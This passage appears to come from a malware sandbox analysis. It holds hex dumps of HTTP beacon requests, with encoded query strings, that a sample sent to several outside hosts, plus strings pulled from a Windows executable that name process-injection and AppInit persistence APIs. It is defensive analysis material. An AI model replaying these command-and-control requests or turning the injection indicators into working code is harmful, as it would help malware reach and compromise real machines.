0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a6966 223e0a20    close....if">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a                                    .

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7633 383d3930   /3521.jpg?v38=90
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42764173   qxG1J42pzMffBvAs
0x00000040 (00064)   334f6a62 77766753 39313758 3635724a   3OjbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   72657365 746d796d 656d6f72 792e636f   resetmymemory.co
0x00000090 (00144)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000a0 (00160)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000b0 (00176)   6c6c612f 322e300d 0a0d0a69 6d207465   lla/2.0....im te
0x000000c0 (00192)   73742070 6167650a 20202020 3c2f7469   st page.    </ti
0x000000d0 (00208)   746c653e 0a20203c 2f686561 643e0a20   tle>.  </head>. 
0x000000e0 (00224)   203c626f 64793e0a 0a202020 203c6833    <body>..    <h3
0x000000f0 (00240)   3e546869 73206973 20746865 20494e65   >This is the INe
0x00000100 (00256)   7453696d 20726561 6c2d6d6f 64652074   tSim real-mode t
0x00000110 (00272)   65737420 70616765 2e2e2e3c 2f68333e   est page...</h3>
0x00000120 (00288)   0a0a2020 20203c69 6d672073 72633d22   ..    <img src="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a367061 32447571 72253242 336c3936   .6pa2Duqr%2B3l96
0x00000160 (00352)   6a353277 63396656 556f6d72 4f424463   j52wc9fVUomrOBDc
0x00000170 (00368)   6857624a 34786c67 65494c73 34305479   hWbJ4xlgeILs40Ty
0x00000180 (00384)   546b2532 42356854 78703933 53593338   Tk%2B5hTxp93SY38
0x00000190 (00400)   31674d77 34313141 72316b6a 30424b56   1gMw411Ar1kj0BKV
0x000001a0 (00416)   794d6348 68785856 2532424b 42347225   yMcHhxXV%2BKB4r%
0x000001b0 (00432)   32427939 55615531 546a6e76 5272496a   2By9UaU1TjnvRrIj
0x000001c0 (00448)   766a7977 6b77464a 6e424772 50666f53   vjywkwFJnBGrPfoS
0x000001d0 (00464)   34474b73 717a414f 31253242 576d6671   4GKsqzAO1%2BWmfq
0x000001e0 (00480)   53774337 36747648 57525851 33387352   SwC76tvHWRXQ38sR
0x000001f0 (00496)   34734458 45783953 59686d73 4c4d645a   4sDXEx9SYhmsLMdZ
0x00000200 (00512)   4c7a3177 70306335 594a3648 78796349   Lz1wp0c5YJ6HxycI
0x00000210 (00528)   37775361 71305667 6c587556 4d4c5468   7wSaq0VglXuVMLTh
0x00000220 (00544)   36532048 5454502f 312e300d 0a436f6e   6S HTTP/1.0..Con
0x00000230 (00560)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000240 (00576)   486f7374 3a206372 617a796c 65616664   Host: crazyleafd
0x00000250 (00592)   65736967 6e2e636f 6d0d0a41 63636570   esign.com..Accep
0x00000260 (00608)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000270 (00624)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000280 (00640)   0a0d0a                                ...


Strings
@
.W
.
.%
.
2.`.
....#.
..
.
.p
080904b0
1.0.0.1
1468
FileVersion
&find
&Find any        Alt+F
LoadAppInit_DLLs
PrivateBuild
ProductVersion
\REGISTRY\MACHINE
Software\Microsoft\Windows NT\CurrentVersion\Windows
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````
^^^^^^^^^^^
~~~~~~~
<<<<<<<
<<<<<<<<<<<<<<<<<````````
=========
==============
===============
|||||||
|?????
         
________
________%%
____%%___\\
,,,,,,
;;;;;;
:::::::
:::::!!!!!!
!!!!!!
!!!!!!!!!!!!!!
??????,,
............
''''''
"""""""""
))))))))))
))))))))))...
))))))))))))
[[[[[[[   
[[[[[[[[
[[[[[[[[[[[[[[[[[[[[
}}}}}}}}}}
@`<_'|
@ "` \
@ * @.@@
**^^^^
****************
\\\\\\\\\\\\\
######
%%%%%%%
%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%
					''
01IC[!t
`@$ @04u
!08kaN
0)jo_%cm
0lTT,`
///111
+++++++++111
[[[[[[[11111111111
1111111111111
1111111999iiii
1B	fUd
1b!v(@
+1IIu+
1t31oZv
222222222222
2A)mk!
2g_,@ _G
;2J"'&
+2LezHD
2Ov]'T
^2QO@@9|
, `2w}
33333333
((((((//////////33333BBBBBBBB
33333uu
3xa\tA:
++++44
'''4444444
@4F[lJ
4)I%Sb
4KNr>/
@@4nrZ
<~>5*@ 
55555:::
555555555555
"5(7 s
_*5C>3
5c*itP
5@D>>-X
'=5eS]T
5JJJJJJJ
@`5N\Z
5_QMR.n
5UrNL] 
5Z7(Q:
	\~6HLu
6>h;\=oa
6Uji4*`@)
	7_2/S[
777777777777===
77777XXXX								
77DDDDjjjjjjjjjjjjjjj
`7~9$@
79[hikb)
7&'O};
7U-}[{
7;xr2"
888888<<<<<<<<<<<
8D#ZNjL
8+|/k/w
8+^kw]>=N
8KZG8Qh]
8@^l"@@
~~8M u
8O/wxRN
]8u7Ds
>-:8vR
90!4}iW
[**]]]]>999________1111111111111111111111111111
999999
99999999
999999999
9999999999[
9l]uCYWD 
9|r( @Yo
9W9-yO
 `9WCl~'
``9`	y
9Ys*@@
a	17~+y$c
&@@a5Ng
aaa===========
aaa....
AAAAAA
AAAAAAAA~~~
AAAAAAAAAAA<<<<
aaaaaaaaaaaaa
\{a?G5
A?hPAPI
]}aplR
arI.Hp^2
a,@@rO{
+++++++++B
b"1\"'
bbbbbb
bbbbbbbb                     
BBBBBBBBBBBBB
BBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
bbbbbbbbbbbbbbbbbKKK
BBBBBBB?????cccccccc
BBBBBBggg))))))))))))
bbbbbbTTTT
BDDDDDDDD"""""
B% `@'I
BitBlt
b`r+OdY
c"``2'
C5iQkEV
:&cAOL
---cccc
ccccccc
CCCCCCCCC%%%%%%%%%%%%
CCqqqq
cGeRQ`
\%C/h:
,CO{ "
 CO2JNB
CreateCompatibleDC
CreateFileW
c=-SS/
Cuy8sM
cV)mm5
`CW	#>g
&&{CwQ
cwwwwwwYYYYYl
c~zNDy/
D{`,@@
%d32G[W
D3M&  U
D~#6! X
@.data
/DDD}}}}}}}}}
dddddd
DDDDDD
DDDDDDD
dddddddddddd
dddddddddddddddd
DeleteCriticalSection
DeleteDC
d[JO2E
dQxeMj
	dr2?Jp
D^rFNK
du>DKy
DuplicateHandle
DX*k_X
  -E@[
E&&&&&&&
 ]E9_<
eeeee}$$$$$
eeeeeeedddddddddd
EEEEEEEE
EEEEEEEEE
eeeeeeeeee
EEEEEEEEEEEE
eeeeeeeeeeeeeee%%
)EGgYI|t`
Enop|]
eOe*@ ,@`
Eum{G/
ExitProcess
]eykKH
f\:& @
f4vZX8
f4y=%y
F"`@}8-I
$$$$<<fffffff
ffffffffff
(FFFFFFFFFFFFF!!!!!
FlushInstructionCache
fM#<uk
FormatMessageA
fTTTTT
'F~	ua
'f*]uqc
@@g{8q)
gavC8b
#+g=BAn=U
{Gd2F8
GetCommandLineA
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetObjectA
GetStartupInfoA
GetTempPathW
GetThreadContext
GetVersionExW
GetWindowsDirectoryW
ggggccccc....
GGGGGGGGGGGGGGGGGGGGGGGGGG
>gJ={k
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
,^gsroj$
|_gyqP
G.Z]Jyda
:.'H*;
H3"``E
h61NEcm-
H&` DR
HeapAlloc
HeapFree
@HFoEu
'''''''''''}}}}}}}}hh
HHHHHH
HHHHHHHHH*
hhhhhhhhhhhhhhhhh
h<LV, 
hO&QJ(
hqXMK-
hv,`@4
\hVpTR!
hXyS/*
i3r @@
`i^3 _u@
I49n(`
i6hk:!
I6S~UZ
@`i70:C
&I!/~9
ia4}`d
``i>B0
i)C:?d
^ic{VKc
 @i^I/
;;;;;;''''''''''III
IIII:::$$$$$$$$
iiiiii
iiiiiii
iiiiiiiii,,,,
iiiiiiiiiii
iiiiiiNNNNN
iiiiJJJBBBBB
-i_J)Q
Ik}j<ID
@iMFbWzW
>iMI(@
 iN{-L
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
I!s<\+}
i+Sz4-
  Iw2rX
jcRc"@
`jCrlQ
jDgdGB
j}"gVd5
jj(((((((((((((((((((__
jjj%%####
jjjjHHHH
JJJJJJJJJJJJ
%%%%%JJJJJJJJJJJJJJJ%%%%
jjjjjjjjjjjjjjj0000000000
JJJJJJJJJooooooooo
@\?j@W
{jx/77
[J!<Xm
jY!Mzf6
_jzEKe
@*  K?
K)8)}|
KdL)|y
KERNEL32.dll
KFb=tv
KG(o9y
...........kk
(((((((kkkkk
kkkkkkkk
kmDsXE
kqbUurh<
KR%K>`yJ(
/Kv)f}
``'<l/
@L0J#2
l3Xj`w
)L5[~O
"`@lah
LBBB-----a
LLLLLLffff4
LLLLLLLLLX
^Lnv5q
LocalFree
Lt?.@m<
lUfH	Z
LVCI{F6
/L^y[,` 
*``Lz?
'Lz;R/w
 :M9jx}
MA[An&  
``MBS!w
mD)o6\Y
Mmb	%s
mmmmmiiiiiiiiii
mmmmmm
MMMMMMM&&&&&&
mmmmmVV
mV%sQV
'-mw2'
mZntbb
.@`N&@
n1|:kp
n2vqEIS&
+}NcH`
NdrByteCountPointerFree
n)koSB
*` nl8nv
NNNNNNNN
NNNNNNNNNNNN
nOybQQ/
nsu;*@
o......
{.!^`	(O
O\4Ti*)
 o8untm
@;OJv4
@ O&` M
=====oo
OO~~~~~~~~Iaaaaaaaaaaaa
O]\om^
oooo((
OOOOOO
ooooooo
OOOOOOOOOOOOOO
ooooooo++ooooooooooooooooooo
oXXXXXXXXXXXXXXXXXXXXXXXXXXX
p6l8w/1M
P7l?7\d
)p9j(O
)pg_!S
@`pn`3+,@
ppp999999999
PPPPPPPPPP
ppppppppppn((((((((
)PR?st
 @Pug#c5.
pus+$p
@@=PUV
qAV@!7
--QD<{
q@\G^"`
qozzzzzzzzzuuuu
QQQaaaaaaaaaaaaa
QQQQQQ"""gg
QQ{{{{{{{{{{{{{qqqqqqqqqqqqqqqqqqqEEEEE
'_=Qq~w
qt"vZ&uf
qv	']t
qVv~Ll
qx4F$=
?$` r.
R*******
{$ @R9
RaiseException
`.rdata
RdP{D"
RealizePalette
rE"  e
.reloc
@R'Il0
ritVj9
[RJKw)
RPCRT4.dll
RpcStringFreeA
======================RR>>>11
rrrrrrr
RRRRRRRR
:::RRRRRRRRRnnn
RRRRRRRRRR
.rrRRRRRRRRR
rrrrrrrrrTTTTT
rs>{2A
RtlUnwind
RuF5d:
RUJ\%DI:
R.w1l1
r;YQTt	l
s,,,,,,,,,,,,,
<\(``S
<S:;/-
S6f)d2AX
SelectObject
SelectPalette
SetLastError
SetLocaleInfoW
SetMapMode
)S\M"fx%
SoUR?>
*************ssss
sssssssss
SSSSSSSSSS
--{{{sssssssssssssssAAAA......(((
SSSSSSSSSSSSSSSSSSS(eeeeeee
t-$ `:
#T3q8R
'%T5_n
_t6l&_b
{}tAS.`
!This program cannot be run in DOS mode.
TlsSetValue
tpc|;w
tttttt
tx%/	nj
U\=.` 
 U@\]{j
UnrealizeObject
uo.KO4
$^UQLz
,,,,,,,,,,,,,,,,uu
UuidCreate
UuidToStringA
[[[[[[[[[[[uuuu
UUUUUU
uuuuuuu
VerQueryValueA
VERSION.dll
|v+Gs.
VirtualProtectEx
{!V~jQ
]v""p{
vv>>>>>>>>~
vvvvvv
VVVVVVVVV
vvvvvvvvvvv
VVVVVVVVVVVVVBBB
VVVVVwwwwwww
>vz/a7
 @'W @`
&@`W{&
w@4%C=zf
W8	]0p
'waiO-dBO
WaitForSingleObject
<WAz7|
,'wIK*+
wm>m3-
WriteProcessMemory
wuhf_v
((====wwwww
wwwwww
&&wwwwwwwww
WWWWWWWWWWWWWW
wwwwwwwwwwwwwwwwwwwwwwwwwwEEEuu
X/6sf<y
xaHvqeU
xBsM5N
_XjKZn0J
@[xl]o
xLo1^8k
X&Qn:I
xWL/qH
++++++++xx
XX9999~~
|$XXd(
xxxxxx
XXXXXXXXXXXX>
XXXXXXXXXXXXXXXX
%XyVfeJr
@@y,@@
YC0R#je
y=d/3::V
`yem)v
Y?FN|g?
 y:q+"
yyyyyy
yyyyyyyyyyy
YYYYYYYYYYYYYYYYYYYYY
YZ_o\9
Z;	54.`@
z}6y;=
<ZH}NA}
zJ6bu<
zL @ +
Z\qoUPC
?Z:R1@
 zRw1/
ZtZ2d<|
::::zz77777
ZZpp<WW
zzzzzz
zzzzzzzz